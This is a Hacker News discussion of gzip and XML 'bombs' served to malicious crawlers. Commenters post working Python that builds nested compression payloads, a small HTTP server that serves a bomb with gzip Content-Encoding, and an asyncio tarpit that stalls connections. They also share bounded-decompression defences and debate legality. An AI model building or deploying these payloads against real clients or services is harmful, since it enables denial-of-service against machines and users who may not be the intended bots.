I would think Transfer-Encoding would be a better choice than Content-Encoding. It's processed at a lower level of the stack and must be decoded – Content-Encoding is generally only decoded if the client is specifically interested in whatever's inside the payload. (Note that you don't have to specify the large Content-Length in this case as it is implied by the transfer coding.)
Also worth trying is an XML bomb [1], though that's higher up the stack.
Of course you can combine all three in one payload (since it's more likely that lower levels of the stack implement streaming processing): gzip an XML bomb followed by a gigabyte of space characters, then gzip that followed by a gigabyte of NULs, then serve it up as application/xml with both Content-Encoding and Transfer-Encoding: gzip.
(Actually now that I think of it, even though a terabyte of NULs compresses to 1 GiB [2], I bet that file is itself highly compressible, or could be made to be if it's handcrafted. You could probably serve that up easily with a few MiB file using the above technique.)
EDIT: In fact a 100 GiB version of such a payload compresses down to ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different from serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)
[1] https://en.wikipedia.org/wiki/Billion_laughs
[2] https://superuser.com/questions/139253/what-is-the-maximum-c...
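For a rough sense of that double-compression effect, here's a minimal sketch (not the payload above; sizes are illustrative, and the inner stream is built incrementally to keep memory use sane):

    import zlib

    def gzip_of_zeros(n_bytes, chunk=1 << 20):
        # Stream-compress n_bytes of NULs into a single in-memory gzip member.
        comp = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS | 16)  # | 16 => gzip container
        out = bytearray()
        zeros = b"\x00" * chunk
        for _ in range(n_bytes // chunk):
            out += comp.compress(zeros)
        out += comp.flush()
        return bytes(out)

    inner = gzip_of_zeros(1 << 30)      # 1 GiB of NULs -> roughly 1 MiB of gzip
    outer = zlib.compress(inner, 9)     # the gzip stream is itself repetitive, so it shrinks again
    print(len(inner), len(outer))

The inner member is what the client ultimately inflates; the outer pass is what rides the second coding (or just sits on disk).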
> EDIT: In fact a 100 GiB version of such a payload compresses down to ~160 KiB on the wire. (No, I won't be sharing it as I'm pretty sure that such reverse-hacking is legally not much different from serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.)
http://www.aerasec.de/security/advisories/decompression-bomb... has a triple-gzipped 100 GB file down to 6 KB; the double-gzipped version is 230 KB.
I'm trying on 1TB, but it turns out to take some time.
> ... I'm pretty sure that such reverse-hacking is legally not much different than serving up malware, especially since black-hat crawlers are more likely than not running on compromised devices.
Sure. But gzip bombs don't do substantial (if any) permanent damage. At most, they'd crash the system. And indeed, that might attract the attention of owners, who might then discover that their devices had been compromised.
You only get two gzips, not three :) (transfer and content codings)
Unless you're serving up XML which is itself zipped, such as an Open Office document. But most clients won't be looking for that.
One useful trick is that, for gzip, d(z(x+y)) = d(z(x) + z(y)), where z is compression, d is decompression and + is concatenation: concatenated gzip members decompress to the concatenation of their contents.
So you don't need to compress the entire terabyte.
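A tiny sketch of why that works, assuming Python's gzip module (sizes here are deliberately small):

    import gzip

    # gzip treats concatenated members as one stream whose output is the
    # concatenation of their contents, so z(x) + z(y) decompresses to x + y.
    member = gzip.compress(b"\x00" * (1 << 20))   # 1 MiB of NULs, compressed once
    bomb = member * 1024                          # decompresses to 1 GiB; nothing was recompressed

    assert gzip.decompress(member * 2) == b"\x00" * (2 << 20)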
If you are smart, you craft your compressed files to be infinite by making them Quines: https://alf.nu/ZipQuine
It's unlikely any of the parsers would apply recursive decompression, so a ZipQuine isn't going to help exhaust resources.
Most (all?) user-agents don't set the TE header (which specifies the transfer encodings the UA is willing to accept), so I doubt they would bother to decode unsolicited "Transfer-Encoding: gzip".
The Accept-Encoding header is used to specify the acceptable transfer encodings. Certainly all browsers set it, and most "advanced" frameworks will at least handle the common values of Transfer-Encoding regardless; a "malicious" crawler will almost certainly have to, as plenty of sites use Accept-Encoding along with User-Agent to block undesirable bots.
Good point, I didn't realize that.
I wonder how these techniques play along with random IDS/IPS/deep packet inspection/WAF/AV/DLP/web cache/proxy/load balancer/etc. devices that happen to look/peek into traffic that passes through the network. I would wager my $ that more than a couple will need some admin(istrative) care after running some of this stuff through them.
And btw -- when you end up accidentally crashing/DoS'ing your corporate WAF or your ISP's DPI, who are they going to call?
I worked on an IPS a few years back. It was specifically designed NOT to inflate arbitrary ZIP files. All decoders worked in a streaming fashion and were limited to a fixed (low) nesting depth and preallocated memory. Typically they would be configured to reject traffic such as the payload we've been discussing.
How come when I posted this (my blog post) here I only got 2 points? https://news.ycombinator.com/item?id=14704462 :D
I'm also intrigued by this. It happens in comments too: the top comment with 20+ upvotes can have the same content as the most down-voted one sitting at -3 points. It's not as common as a repost reaching the front page while the original only got 2 points, though.
After submitting something to HN I like to watch the HTTP logs. I get a lot of visits from bots, but it's actually only about 10-20 real people who actually read your blog. I don't know enough statistics to explain it well, but as 20 people is such a small share of the total HN readership, it's basically luck. And those who read the "new" section might be a bit skewed from those who only read the front page. If you want to help HN get better with more interesting content, you can help by actually visiting the "new" section.
We know how to deal with this, and have for years. A bot which instruments and invokes humans, learning about content and individuals both. Few humans are needed each time, and those need not be experts, if used well. 20 people is much more than enough. A candy machine, in an undergraduate lounge, can grade CS 101 exams. [1] Ah, but discussion support - from Usenet to reddit (and on HN too), incentives do not align with need. Decades pass, and little changes. Perhaps as ML and crowdsourcing and AR mature? Civilization may someday be thought worth the candles. Someday?
[1] http://represent.berkeley.edu/umati/
Edit: tl;dr: Future bot: "I have a submission. It has a topic, a shape, and other metrics. It's from a submitter, with a history. Perhaps it has comments, also with metrics, from people also with histories. I have people available, currently reading HN, who all have histories. That's a lot of data - I can do statistics. Who might best reduce my optimization function uncertainty? I choose consults, draw the submission to their attention, and ask them questions. I iterate and converge." Versus drooling bot: "Uhh, a down vote click. Might be an expert, might be eternal September... duh, don't know, don't care. points--. Duh, done."
Maybe the "new" section should be the default one.
The Economist once changed their default comments view from "most recommended" to "newest". Suddenly the advantage of being the first to post a moderately good comment vanished. Design matters.
You can try writing "Show HN" at the start of your title, but that hasn't even helped me too much. I still get more upvotes/karma from writing witty comments instead of publishing code.
a bit of a witty comment there...upvoted. :)
My pet theory is that very few people visit /newest and even fewer are consistently and persistently active over there. This means that, in general, only a handful of people's inherently subjective taste steers the ship. I find this fascinating.
Lessons learned:
1. Stop posting to HN and let others do it for you
2. Spend more effort on writing the blog and less on HN karma
3. ... (monetize)
4. Profit!!! (+ more blog posts about how you monetized and instantly gain more HN karma than posting will ever do)
</sarcasm>
=) upvoted for original content.
Upload time of day is also important
Also if it doesn't make it to the front page, it's hardly seen at all.
Bad luck. There aren't very many people looking at the new posts page, and posts drop off quite fast.
Sorry! Didn't realize you already posted this before.
Meritocracy /s
Reminds me of a time I once wrote a script in Node to send an endless stream of bytes at a slow & steady pace to bots that were scanning for vulnerable endpoints. It would cause them to hang, preventing them from continuing on to their next scanning job, some remaining connected for as long as weeks.
I presume the ones that gave out sooner were manually stopped by whoever maintains them or they hit some sort of memory limit. Good times.
I do the same to "Microsoft representatives" that call me because I have "lots of malware on my computer".
Keep them on the line by being a very dumb customer until they start cursing and hang up on me. :-)
1-347-514-7296 is a phone number that automates this. Add it to a conference call, and frustrate the caller with no additional work. http://Reddit.com/r/itslenny is the closest thing it has to an official site.
Doesn't that burn up a lot of time? I just cut straight to the hanging-up part, with optional cursing to taste.
This is actually a new take on a fairly well known security/DoS attack called the "slow post" attack (https://blog.qualys.com/securitylabs/2012/01/05/slow-read)
pretty novel to see it used the other way around though!
Interesting and related re attacks on a Tor hidden service: http://www.hackerfactor.com/blog/index.php?/archives/762-Att...
And the follow up: http://www.hackerfactor.com/blog/index.php?/archives/763-The...
Very interesting read indeed. I have a question about it: the article is about defeating malicious crawlers/bots hitting a Tor hidden service, so how might the author differentiate bot requests from standard client requests on a request-by-request basis? I mean, can I assume that many kinds of requests arrive at a hidden service through shared/common relays? Would this mean other fingerprinting methods (user agent etc.) become important, and if so, what options remain for the author if the attackers dynamically change/randomise their fingerprint on a per-request basis?
Very entertaining read, thank you for sharing these. I used to dismiss black ICE [0] as cyberpunk tropes and it's good to be proven ignorant.
[0]:https://en.wikipedia.org/wiki/Intrusion_Countermeasures_Elec...
Wait a minute... He is doing the exact same thing as the former RaaS (ransomware as a service) operator Jeiphoos (he operated Encryptor RaaS). It's known that Jeiphoos is from Austria. Exactly one year after the shutdown of the service, someone from Austria is publishing exactly the same thing an Austrian ransomware operator was doing a year ago.
Aha! The Hacker News detectives are on the case!
Does anyone know if this kind of white hat stuff has been tested by law?
Because it seems in the realm of possibility that if a large botnet hits you and your responses crash a bunch of computers you could do serious time for trying it. I'm hoping there's precedent against this...
He's got a pretty good defence in that all he's really doing is filtering requests and serving up a really large file to some of them. No active agency, and no executable code. If merely loading a large file crashes a computer, that's arguably the fault of the browser and/or OS.
Intent really matters, especially in cases like these. He's serving up files deliberately, knowing they will likely cause problems.
Microsoft doesn't take the fall for malware, even if it's a fault in SMB or the like.
The intent is damage.
There are laws allowing a person to shoot an intruder in their house. And I can't serve nulls from my own web server? That would be ridiculous.
From what I've read, in some parts of America it seems okay to shoot at intruders running away from your house, which I find unreasonable.
A farmer here in the UK stirred up a whole load of shit when he shot two burglars [1] trying to escape from his property.
[1] https://en.wikipedia.org/wiki/Tony_Martin_(farmer)
Most of those laws are self-defence laws. The US & the UK have slight differences, but you're often allowed to use lethal force to prevent yourself being killed.
Do you have an NRA?
Complete failure is a better outcome for an infected machine than silent intrusion. The owner then definitely knows something is wrong, AV software or not.
I don't think there's a law against serving obscenely large files on the web, at least nowhere except Germany.
>I don't think there's a law against...
Connecting to a server... (a lot)
Putting random strings into forms... (a lot)
Moving your money between banks... (in different countries)
Buying stocks... (with insider knowledge)
A simple act doesn't tell the whole story, and fraud, computer crime, etc. laws are written vaguely enough for a country to prosecute someone for "sending large files."
This is why web crawlers are built with upper boundaries on everything!
Nobody malicious brings down crawlers. It's just unexpected things you find out on the internet.
> Nobody malicious brings down crawlers.
You're wrong about that. I've more than once brought down crawlers on purpose, especially the ones that didn't respect robots.txt.
The article says that 42.zip compresses 4.5 petabytes down to 42 bytes. It should say 42 kilobytes.
I don't see a way to comment on the article itself, but hopefully the author reads this.
Thank you. I was going crazy trying to think of what the contents of that 42 bytes would have been.
Without any headers, metadata or padding, and using RLE with one byte for the zero and 8 bytes for the repeat count, 10^15 easily fits in 9 bytes and can be used to generate a file filled with one petabyte of zeroes.
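As a toy illustration of that 9-byte figure (the record format here is invented for the example: one literal byte plus an 8-byte big-endian repeat count):

    import struct

    record = struct.pack(">cQ", b"\x00", 10**15)  # 1 literal byte + 8-byte count = 9 bytes for a petabyte of NULs
    assert len(record) == 9

    def expand(rec, chunk=1 << 20):
        # Stream the decoded run out in chunks instead of materialising a petabyte.
        literal, count = struct.unpack(">cQ", rec)
        while count:
            n = min(count, chunk)
            yield literal * n
            count -= n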
thanks I fixed it
Another small point: you don't need that starts-with function, just check strpos(...) === 0.
I don't think this "Defends" your website. If anything, it draws attention to it.
Might also be used for some kind of reflection attack. Want to kill some service that lets users provide a URL (for an avatar image or something)? Point it to your zip bomber.
To be fair, people wanting to do that don't need the author to have created a zip bomber; they can make one themselves.
Actually, I don't see how to defend against this. Is there any way to ask a gzip file which size it will be once unzipped, without needing to decompress it?
>Is there any way to ask a gzip file which size it will be once unzipped, without needing to decompress it?
The closest is decompressing it while counting the output bytes and immediately discarding them.
But of course the proper defense is to give up if you exceed a predefined memory or time budget.
Yes, but your decompression middleware might need an update/change: when you ask it to decompress, you specify the max size (instead of asking it to decompress everything).
I think this is exactly what the HTTP 'HEAD' verb is for: https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HE...
Decompress it in chunks and stop when a preset limit is reached.
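Something along these lines, assuming gzip-encoded input and an arbitrary 10 MiB budget:

    import zlib

    LIMIT = 10 * 1024 * 1024  # arbitrary output budget

    def bounded_gunzip(chunks, limit=LIMIT):
        # Inflate a gzip stream chunk by chunk and bail out once the
        # decompressed output exceeds the budget.
        d = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)  # | 16 => expect a gzip header
        out = bytearray()
        for chunk in chunks:
            out += d.decompress(chunk, limit + 1 - len(out))
            if len(out) > limit:
                raise ValueError("decompressed size exceeds budget; probable bomb")
        return bytes(out)

(A fuller client would also loop over d.unused_data to handle concatenated gzip members.)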
A friend of mine has a very useful little service that tracks attempts to breach servers from all over the world:
https://www.blockedservers.com/
It's a lot more effective to kill the connection rather than to start sending data if you're faced with a large number of attempts.
Interesting page :) I'll write your friend an email with improvements for the site. The text shadow in the code blocks makes them barely readable, and the map color coding is bad for color-blind people.
I'm sure he will appreciate that. He's sysadmin at a Dutch IPSP and this is his side project.
This is like the soft equivalent of leaving a USBKill device in your backpack, to punish anyone who successfully steals it and tries to comb through your data.
Way to make friends with the TSA. ;-)
Is this actually illegal? I'm sure they'd arrest you, but could they actually charge you?
I guess if you see them try to use the USB killer, you'd be obligated to report it. Otherwise I don't think it's an issue.
I think the natural next step is to make this into a Wordpress plugin.
This would be an entertaining way of dealing with MITM agents as well, over HTTP. As long as the client knows not to open the request, you could trade them back and forth with the MITM spy wasting tons of overhead.
It would be an interesting way of streaming data if both sides used a custom decompression algorithm that skipped n bytes without allocating it anywhere.
The payload could be the encrypted text of two chat bots talking gibberish.
Now that's very interesting. Maybe hack a custom ssh with this feature. Adversaries that intercepted data or attempted MitM would be inconvenienced.
Edit: Or even more useful, bbcp. Which is the best file transfer app that I've ever used.
Sounds a bit like a simplified "Chaffing and Winnowing"[1], where the chaff identification is pre-shared through your custom compression parameters.
There was an HN story [2] on Chaffinch [3], which is where I came across the idea.
[1] https://en.wikipedia.org/wiki/Chaffing_and_winnowing [2] https://news.ycombinator.com/item?id=14408757 [3] https://www.cl.cam.ac.uk/~rnc1/Chaffinch.html#Chaffing
Another method is wasting attackers' time by sending out a character per second or so. It works so well against spam that OpenBSD includes such a honeypot, spamd.
Sending out a character per second means that you'll keep the connection open for a long time, and even if your server is behind a CDN this would eventually let an attacker exhaust your resources.
Think this through.
If a large number of hosts treats some behaviour as deserving a slow-service attack, then clients exhibiting that behaviour are faced with a large set of slow-serving servers.
Any given server can monitor how many slow-service attacks it is currently providing. Given that a criterion for an SSA is having already determined that the connection is not a friendly one, then monitoring useful vs. useless (e.g., SSA) connections, and being prepared to terminate (or better: simply abandon) the SSA connections as normal traffic ramps up, is a net benefit.
Meantime, the hostile clients are faced by a pervasive wall of mud, slowing their access.
An open connection with no communication going on does not take up a lot of resources; it's just some values in a table maintained by the TCP stack. If you implement that slow-down service in an event-driven way so it can handle a lot of concurrent connections, it should not take up many resources either. In the end you can always limit the number of connections you treat that way to a value your system can easily bear.
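A minimal event-driven sketch of that idea (asyncio; the port and the one-NUL-per-second drip are arbitrary choices):

    import asyncio

    async def tarpit(reader, writer):
        # Drip one byte per second; each stalled client costs little more
        # than a socket and a timer.
        try:
            while True:
                writer.write(b"\x00")
                await writer.drain()
                await asyncio.sleep(1)
        except (ConnectionResetError, BrokenPipeError):
            pass
        finally:
            writer.close()

    async def main():
        server = await asyncio.start_server(tarpit, "0.0.0.0", 2222)
        async with server:
            await server.serve_forever()

    asyncio.run(main())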
I would love to know how to configure this for ssh connection attempts
SSH does support compression, but it seems to apply only if the client requests it (ssh -C).
You could, though, write a pam module to trickle data out very slowly. Maybe pam_python would be easier to experiment with.
I use pam_shield to just null route ssh connections with X failed login attempts. There's no retaliation in that approach, but it does stop the brute forcing.
If you are feeling adventurous, I guess you can just let them log in as a special user whose shell is set to a program that sends single characters very slowly. It is probably quite insecure, though.
I have something similar on my VPS; edit /etc/issue.net to this
fail2ban, in a general sense.
We need some legal advice in this thread.
What if the compressed file is plausibly valid content? How could intent be malicious if a request is served with actual content?
In this day and age, finding a vulnerability in a system like a mistakenly open API and running a script to call it a few times to investigate the weakness is considered hacking.
It probably shouldn't be, but law is funny that way.
Intentionally sending a zip bomb could potentially get you in trouble as well. Especially if you're just one private person or a small company without a legal division to brush it off.
There isn't a real black/white interpretation though, at least not outside the US (where there may be case history to influence rulings on the subject), and obviously most victims wouldn't report you, but more often than not you wouldn't want to be the one testing the interpretation of IT-related law.
Reminds me a bit of Upside-Down-Ternet: http://www.ex-parrot.com/pete/upside-down-ternet.html
Defending by throwing things back at the attacker, instead of simply locking your door.
This is more that the thief is parked at your front door permanently trying to pick the lock, so you replace the valuables he's looking for with big chunks of lead.
More like hungry bears.
This might actually work well with fail2ban integration. Every time you block a connection, you also respond to the final request with a big ol' file.
No, he’s doing both.
A great way... to provoke a war with people running botnets.
This could also be seen as a bug on the browser side. I'd also be interested in the browser results for the petabyte version.
I wonder if there's room to do this with other protocols? Ultimately we want to crash whatever tool the script kiddie uses.
I thought of HTTP/2's HPACK. It does have built-in protection, though: the client sets a maximum header table size, which encourages client implementations to think about it.
About a month ago one of my websites was being scraped. They were grabbing JSON data from a mapping system.
I replaced it with a GZIP bomb. It was very satisfying to watch the requests start slowing down, and eventually stop.
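Not their code, but a minimal sketch of serving a pre-built payload that way (bomb.gz is a hypothetical pre-compressed file of NULs; any client library that honours Content-Encoding will inflate it on receipt):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    with open("bomb.gz", "rb") as f:  # hypothetical pre-built gzip bomb
        BOMB = f.read()

    class BombHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # Claim the body is gzip-compressed JSON; a well-behaved client
            # will transparently decompress it.
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Encoding", "gzip")
            self.send_header("Content-Length", str(len(BOMB)))
            self.end_headers()
            self.wfile.write(BOMB)

    HTTPServer(("", 8080), BombHandler).serve_forever()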
Interesting!
That also crossed with another thought about pre-compressing (real!) content so that Apache can serve it gzipped entirely statically with sendfile() rather than using mod_deflate on the fly. So, unless I've misunderstood, I think that bot defences can be served entirely statically to minimise CPU demand. I don't mind a non-checked-in gzip -v9 file of a few MB sitting there waiting...
http://www.earth.org.uk/note-on-site-technicals.html
Similar topic a couple of months ago:
https://news.ycombinator.com/item?id=14280084
Directly serving /dev/zero or /dev/urandom also gives interesting results. (Be aware of bandwidth costs)
Oh, this seems quite an interesting experiment. Curious, though, whether this defence poses any additional risks (besides bandwidth) on the server. I mean, is there any significant chance that the random data could cause a glitch in the server implementation?
Wow, you killed Tails!
I tried visiting the payload site with Tails OS (a Linux distro for the privacy-minded) and the whole OS is frozen.
The GZIP format stores the uncompressed size (modulo 2^32) in its trailer, and ZIP stores it in its local and central directory headers. You could stream and check these fields to determine if a zip bomb is being delivered. Obviously something script-kiddies aren't going to do, but the scripts they use can be improved and redistributed fairly easily.
Could the field be spoofed so that it claims 1 MB, or might clients/bots typically be strict about ensuring the values are valid? I think the issue you raised is important though, and any serious client/bot should be ignoring files with 1 KB -> 1 GB decompression ratios.
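For what it's worth, a sketch of reading gzip's size field; it lives in the 4-byte trailer, holds the length modulo 2^32, and is trivially forgeable, so it's a hint rather than a defence:

    import struct

    def gzip_claimed_size(path):
        # ISIZE: the last four bytes of a gzip member, little-endian,
        # give the uncompressed length modulo 2**32. Easy to forge, and it
        # wraps for anything over 4 GiB.
        with open(path, "rb") as f:
            f.seek(-4, 2)  # seek relative to the end of the file
            return struct.unpack("<I", f.read(4))[0]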
Was there a reduction in IPs that fail2ban would have picked up but that were instead treated with the zip bomb?
Do browsers protect against media served with Content- or Transfer-Encoding like this? If you use something that lets you embed images, what's to stop you from crashing the browser of anyone who happens to visit the page your "image" is on?
Nothing. I mean, crashing browsers with a client-side DoS is possible in many ways.
With some horrible WebGL code I've crashed the macOS compositor before.
Browsers already have massive codebases; I can't really imagine securing every non-security-critical DoS vector.
A similar `slow bomb` could be created for attempted ssh connections to a host using a sshrc script. For example clients which do not present a key, just keep them connected and feed them garbage from time to time. Or rickroll them.
doesn't this incur large bandwidth data charges for the defender?
no, it's just sending a tiny zip file, decompression occurs at the other end
10 MB (the compressed GZIP given in the example) can be considerable. Even more so if you consider just how frequently bots are hitting those wp endpoints.
Wouldn't all but the most naive scanners use time-out settings, maximum lengths on bytes read etc?
We are developing a web application security scanner [1] and we indeed use a max-length setting and also detect binary responses. I just tested this and, as expected, it worked fine.
I'm actually surprised that many other scanners failed to do this.
[1] https://www.netsparker.com
> Wouldn't all but the most naive scanners use time-out settings, maximum lengths on bytes read etc?
A time-out or a cap on bytes read wouldn't save a scanner from crashing. The defense can send the ~100 KB of zipped data in a matter of seconds; the client then decompresses it, it expands to gigabytes, and the process crashes with an out-of-memory error.
Was thinking more about a maximum length for the decompression stage.
What are good strategies for protecting your website against ZIP bomb file uploads?
Ironically, it looks like the site has been DoS'd by HN.
you better have unlimited bandwidth to try 10G))
In the example, the server only sends 10MB. The data is 10GB only after unzipping, which occurs on the client.
brilliant
Interesting: on FF54 the test link pegs a CPU but the memory doesn't rise. Eventually it stops and the CPU returns to normal. But then I did a 'view source', and memory use rose until the browser got OOM-killed (20 GB free RAM + swap).
I wonder if the browser is smart enough not to decompress when viewing, or whether it just uses it as a stream?
* Firefox: memory rises up to 6-7 GB, then it just loads endlessly. Tab closable.
Just tried it using Pied Piper's middle-out algorithm and I'm seeing astonishing results. It's so simple! D2F.1 = D2F.2, D2F.3 = D2F.4